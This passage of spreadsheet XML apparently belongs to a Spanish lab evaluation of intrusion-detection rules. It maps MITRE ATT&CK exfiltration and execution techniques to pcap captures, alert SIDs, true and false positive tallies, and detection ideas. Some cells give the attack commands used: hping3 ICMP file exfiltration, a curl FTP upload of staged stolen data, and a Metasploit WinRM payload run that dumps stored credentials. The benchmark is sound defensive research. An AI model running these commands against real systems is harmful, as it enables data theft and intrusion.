  </si>
  <si>
    <t>Regla que detecte múltiples interacciones con la API LSM_API_service del servicio RPC desde el mismo equipo origen.</t>
  </si>
  <si>
    <t>Manual [4] /  3.12</t>
  </si>
  <si>
    <t>Manual [4] / B.12</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Descubrimiento de dominios de confianza en entorno Active Directory</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>T1482-Domain_trust_discovery_[4].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que detecte paquetes LDAP, procedentes de equipos que no son DC en la red (configurable manualmente) y con la cadena objectClass=trustedDomain</t>
  </si>
  <si>
    <t>Manual [4] /  3.13</t>
  </si>
  <si>
    <t>Manual [4] / B.13</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltración por ICMP</t>
  </si>
  <si>
    <t xml:space="preserve">T1048.003-Exfiltration_over_ICMP_[2].pcapng </t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31767,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100384,2002752,2002749,2100408,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408,31767</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>Regla genérica que detecte PING inusual.</t>
  </si>
  <si>
    <t>Exfiltracion mediante protocolo ICMP. Envia varios echo Request que contienen como datos el contenido de ese fichero. Comando: echo "Esto es un exfiltración sobre ICMP" &gt; file;timeout 15s hping3 --file ./file --data 36 192.168.2.2 --icmp</t>
  </si>
  <si>
    <t>Manual [2] /  3.2.2.1</t>
  </si>
  <si>
    <t>Manual [4] / B.27</t>
  </si>
  <si>
    <t>Exfiltración por FTP</t>
  </si>
  <si>
    <t>Caldera</t>
  </si>
  <si>
    <t>T1048.003-Exfiltration_over_FTP_[3].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2100472,2006409,2043217</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2003303,2003410</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2015016,50447</t>
    </r>
  </si>
  <si>
    <t>Exfiltracion de datos utilizando el protocolo FTP. Utilizando caldera y la operacion Advanced Thief. Comando: curl -T stage_to_steal.tar.gz.gpg ftp://172.16.1.2/VictimDirectory/ --user "dit:dit"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.15</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.15.4</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t xml:space="preserve"> T1011.001</t>
  </si>
  <si>
    <t>Extracción via Bluetooth</t>
  </si>
  <si>
    <t>Covenant, btobex, Bluetooth</t>
  </si>
  <si>
    <t>T1011-Exfiltration_over_bluetooth_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red Bluetooth. Envío y/o recepción de información comprometida por la red Bluetooth</t>
  </si>
  <si>
    <t>Manual [4] /  3.23</t>
  </si>
  <si>
    <t>Manual [4] / B.23</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Ejecución de script en Python para activar el reenvío de paquetes en el equipo víctima</t>
  </si>
  <si>
    <t>SSH, Scapy</t>
  </si>
  <si>
    <t>T1020.001-Automated_exfiltration_traffic_duplication_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red que detecte el envío duplicado de paquetes procedentes de un mismo origen interno a la organización</t>
  </si>
  <si>
    <t>Manual [4] /  3.24</t>
  </si>
  <si>
    <t>Manual [4] / B.24</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Comunicación C2 para el establecimiento de extracción programada</t>
  </si>
  <si>
    <t>Covenant, Powershell</t>
  </si>
  <si>
    <t>T1029-Scheduled_transfer_[4].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2101917</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías, basada en el descubrimiento de eventos programados que no han sido creados por el usuario.</t>
  </si>
  <si>
    <t>Manual [4] /  3.25</t>
  </si>
  <si>
    <t>Manual [4] / B.25</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Dividir archivos para realizar transferencias menores a un umbral que provoque alertas</t>
  </si>
  <si>
    <t>ftp, split</t>
  </si>
  <si>
    <t>T1030.pcapng</t>
  </si>
  <si>
    <t>Dependiendo la forma en la que se envien los archivos, puede ser indetectable. Sin embargo, si utiliza protocolos de transferencia de ficheros (FTP,SMB...) resulta importante monitorizar transferencias con un mismo tamaño de manera concurrente</t>
  </si>
  <si>
    <t>Transferencia de ficheros mediante FTP, previamente divididos en paquetes de un tamaño constante</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.9.1</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transferir archivos de una cuenta a otra mediante un servicio en la nube</t>
  </si>
  <si>
    <t>OneDrive</t>
  </si>
  <si>
    <t>T1537.pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías</t>
  </si>
  <si>
    <t>Transferir entre dos cuentas en la nube unos ficheros</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.9.2</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltración por canal C2</t>
  </si>
  <si>
    <t>T1041.pcapng</t>
  </si>
  <si>
    <t>2043217,2034567,2013028,2016992</t>
  </si>
  <si>
    <t>50447, 2043217, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
  </si>
  <si>
    <t>Detección por anomalías basada en la sospecha de una extracción de información confidencial por un posible canal C2</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.14</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.14.4</t>
  </si>
  <si>
    <t>Exfiltration over Web Service</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltrar datos de un equipo a la nube</t>
  </si>
  <si>
    <t>Google Drive</t>
  </si>
  <si>
    <t>T1567.002.pcapng</t>
  </si>
  <si>
    <t>Transferir ficheros de un equipo a la nube</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.9.3</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Enlace malicioso</t>
  </si>
  <si>
    <t>wget</t>
  </si>
  <si>
    <t>T1204.001.pcapng</t>
  </si>
  <si>
    <t>Redireccion al pinchar en un enlace a un sitio malicioso. Comando : wget http://172.16.1.2 (Desde la víctima)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.17</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.17.4</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Ejecución de carga por WinRM</t>
  </si>
  <si>
    <t>T1047.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1394</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 20619</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1394</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,20619</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte intento de ejecucion de código shell en un equipo</t>
  </si>
  <si>
    <t>Ejecucion de payload en un equipo mediante WinRM. Comando: msfconsole -x "use exploit/windows/winrm/winrm_script_exec; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; set LPORT 5555; set username administrator; set password vagrant; set force_vbs true; run -z; sessions -c 'cmdkey /list'; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.4.1</t>
  </si>
  <si>
    <t>Manual [4] / B.26</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Ataque con Botnet</t>
  </si>
  <si>
    <t>T1203-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Ejecución de un Servicio / Fichero Ejecutable de manera remota</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>T1569-System_services_service_execution_[4].pcapng</t>
  </si>
  <si>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</si>
  <si>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r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385</t>
    </r>
  </si>
  <si>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r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">. 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385, 2101620, 2100459, 2044666, 2051116, 2024510, 2002752, 2002749, 2027191</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Existen múltiples métodos de detección. Como ejemplos:
        Regla que detecte la cadena “PSEXESVC” en el contenido de mensajes SMBv2
        Regla que detecte archivos ejecutables en mensajes SMB
</t>
  </si>
  <si>
    <t>Manual [4] /  3.6</t>
  </si>
  <si>
    <t>Manual [4] / B.6</t>
  </si>
  <si>
    <t>LEYENDA DETECTABILIDAD POR PATRONES</t>
  </si>
  <si>
    <t>LEYENDA SIDs (TP y FP)</t>
  </si>
  <si>
    <t>LEYENDA ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>False Positive ■</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">True Positive Colateral </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF6AA84F"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">True Positive </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FFFF0000"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <t>SI [1]</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas</t>
  </si>
  <si>
    <t>No, salvo circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas y circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>SID no relacionado con el ataque, evento de red, o legítimo, alerta no válida</t>
  </si>
  <si>
    <t>SID relacionado con otra parte del ataque, no se contabiliza como alerta válida</t>
  </si>
  <si>
    <t>SID relacionado con el ataque, alerta válida</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>#SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>Contiene Flujos Truncados (Sin SYN)</t>
  </si>
  <si>
    <t>smtp-FIX.pcapng</t>
  </si>
  <si>
    <t>REAL</t>
  </si>
  <si>
    <t>Básico</t>
  </si>
  <si>
    <t>1,9 kB</t>
  </si>
  <si>
    <t>2002749</t>
  </si>
  <si>
    <t>http-FIX.pcapng</t>
  </si>
  <si>
    <t>52,7 kB</t>
  </si>
  <si>
    <t>2002749,2002752,2101620</t>
  </si>
  <si>
    <t>youtube-FIX.pcapng</t>
  </si>
  <si>
    <t>332,7 kB</t>
  </si>
  <si>
    <t>2002749,2002752,2101620,51037</t>
  </si>
  <si>
    <t>01 - DIT (01 - DIT (captura_00001_20240125083640)).pcapng</t>
  </si>
  <si>
    <t>TD</t>
  </si>
  <si>
    <t>100 MB</t>
  </si>
  <si>
    <t>2001219, 2002910, 2002911, 2003068, 2008120, 2010935, 2010937, 2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2001219, 2002749, 2002752, 2002910, 2002911, 2003068, 2008120, 2009207, 2010935, 2010937, 2019102, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2100615, 2100650, 2101384, 2101390, 2101411, 2101417, 2101444, 2101917</t>
  </si>
  <si>
    <t>02 - DIT (02 - DIT (captura_00001_20240202080842)).pcapng</t>
  </si>
  <si>
    <t>3,9 MB</t>
  </si>
  <si>
    <t>2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2100381, 2100384, 2100399, 2100402, 2100408, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>03 - DIT (03 - DIT (captura_00002_20240125191218)).pcapng</t>
  </si>
  <si>
    <t>103 MB</t>
  </si>
  <si>
    <t>2019102, 2100366, 2100476, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100366, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100476, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>04 - DIT (04 - DIT (captura_00003_20240126181602)).pcapng</t>
  </si>
  <si>
    <t>109 MB</t>
  </si>
  <si>
    <t>2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100381, 2100382, 2100384, 2100385, 2100399, 2100402, 2100404, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>05 - DIT (05 - DIT (captura_00004_20240128151951)).pcapng</t>
  </si>
  <si>
    <t>107 MB</t>
  </si>
  <si>
    <t>2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2027397, 2036751, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>06 - DIT (06 - DIT (captura_00005_20240130061546)).pcapng</t>
  </si>
  <si>
    <t>106 MB</t>
  </si>
  <si>
    <t>2009967, 2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009205, 2009206, 2009207, 2009208, 2009582, 2009967, 2019102, 2027397, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>07 - DIT (07 - DIT (captura_00006_20240131165021)).pcapng</t>
  </si>
  <si>
    <t>48 MB</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009206, 2009207, 2009208, 2019102, 2027397, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>TOTAL</t>
  </si>
  <si>
    <t>2001219,2002910,2002911,2003068,2008120,2010935,2010937,2019102,2101384,2101411,2100366,2100476,2027397,2009967</t>
  </si>
  <si>
    <t>51037,2001219,2002910,2002911,2003068,2008120,2010935,2010937,2019102,2101384,2101411,2100366,2100476,2027397,2009967</t>
  </si>
  <si>
    <t>2002749,2002752,2101620,51037,2001117,2001219,2002910,2002911,2003068,2008120,2009207,2010935,2010937,2019102,2100381,2100384,2100385,2100399,2100402,2100408,2100469,2100472,2100527,2100615,2100650,2101384,2101390,2101411,2101417,2101444,2101917,2009582,2100366,2100476,2100382,2100404,2036751,2008470,2009205,2009206,2009208,2009967,2027397</t>
  </si>
  <si>
    <t>Paquetes Reglas (Nº único de reglas)</t>
  </si>
  <si>
    <t>Técnicas detectadas</t>
  </si>
  <si>
    <t>Ataques detectados</t>
  </si>
  <si>
    <t>Alertas totales (SIDs)</t>
  </si>
  <si>
    <t>Alertas promedio (SIDs) por ataque</t>
  </si>
  <si>
    <t>Community</t>
  </si>
  <si>
    <t>Táctica</t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS</t>
  </si>
  <si>
    <t>TOTAL ATAQUES</t>
  </si>
  <si>
    <t>TOTAL SIDS</t>
  </si>
  <si>
    <t>TOTAL DETECTADAS</t>
  </si>
  <si>
    <t>TOTAL DETECTADOS</t>
  </si>
  <si>
    <t>TOTAL ALERTAS</t>
  </si>
  <si>
    <t>TOTAL NO DETECTADAS</t>
  </si>
  <si>
    <t>TOTAL NO DETECTADOS</t>
  </si>
  <si>
    <t>PORCENTAJE RESPECTO A TOTAL</t>
  </si>
  <si>
    <t>PORCENTAJE DETECTADAS</t>
  </si>
  <si>
    <t>PORCENTAJE DETECTADOS</t>
  </si>
  <si>
    <t>PORCENTAJE NO DETECTADAS</t>
  </si>
  <si>
    <t>PORCENTAJE NO DETECTADOS</t>
  </si>
  <si>
    <t>TP totales (SIDs)</t>
  </si>
  <si>
    <t>Efectividad SIDs (Nº de TP / Alertas totales)</t>
  </si>
  <si>
    <t>TOTAL TP</t>
  </si>
  <si>
    <t xml:space="preserve">PORCENTAJE TP RESPECTO A TOTAL </t>
  </si>
  <si>
    <t>LEYENDA PROCEDENCIA DE PCAPS (Manual [n])</t>
  </si>
  <si>
    <t>Referencia</t>
  </si>
  <si>
    <t>Título</t>
  </si>
  <si>
    <t>Autor</t>
  </si>
  <si>
    <t>URL Acceso</t>
  </si>
  <si>
    <t>Seguridad en conmutadores de red y puntos de acceso. Clasificación y realización práctica de ataques</t>
  </si>
  <si>
    <t>Javier García Clavero</t>
  </si>
  <si>
    <t>https://idus.us.es/bitstream/handle/11441/159132/TFG4947_Garc%C3%ADaClavero.pdf?sequence=2&amp;isAllowed=y</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Dataset-CIC-2018</t>
  </si>
  <si>
    <t>UNB - CIC</t>
  </si>
  <si>
    <t>https://www.unb.ca/cic/datasets/ids-2018.html</t>
  </si>
  <si>
    <t>ERROR TCP_REPLAY</t>
  </si>
  <si>
    <t>SIDs FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>#SIDs FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>SIDs FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>#SIDs FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>SIDs FP Totales</t>
  </si>
  <si>
    <t>#SIDs FP Totales</t>
  </si>
  <si>
    <t>43814, 45360</t>
  </si>
  <si>
    <t>46199, 15621</t>
  </si>
  <si>
    <t>29247, 12449</t>
  </si>
  <si>
    <t>XXX</t>
  </si>
  <si>
    <t>SI (paquetes con tamaño 0)</t>
  </si>
  <si>
    <t>43799, 43963, 43796</t>
  </si>
  <si>
    <t>44780, 12648, 15229, 15463, 46767, 27560, 43336, 12015, 30908, 13106, 24975, 13011, 18057, 15621, 10574, 34971, 12577, 10181, 12758, 12709, 12979, 50825, 12980, 10003, 48010, 15117, 29613, 14946, 15091, 14950, 14857, 14956, 13825, 14947, 15115, 29615, 15100, 14740, 30542, 14157, 15092, 14949, 15118, 29564, 14742, 15110, 14230, 10819, 14737, 14953, 15114, 14341, 29614, 14948, 32033, 29965, 31752, 47202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</si>
</sst>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33">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font/>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <strike/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
  </fonts>
  <fills count="14">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CCCCCC"/>
        <bgColor rgb="FFCCCCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F3F3"/>
        <bgColor rgb="FFF3F3F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFEFEF"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF6D01"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9E7FD"/>
        <bgColor rgb="FFD9E7FD"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="2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thin">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>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top style="thin">
        <color rgb="FF000000"/>
      </top>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0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="4" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="5" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
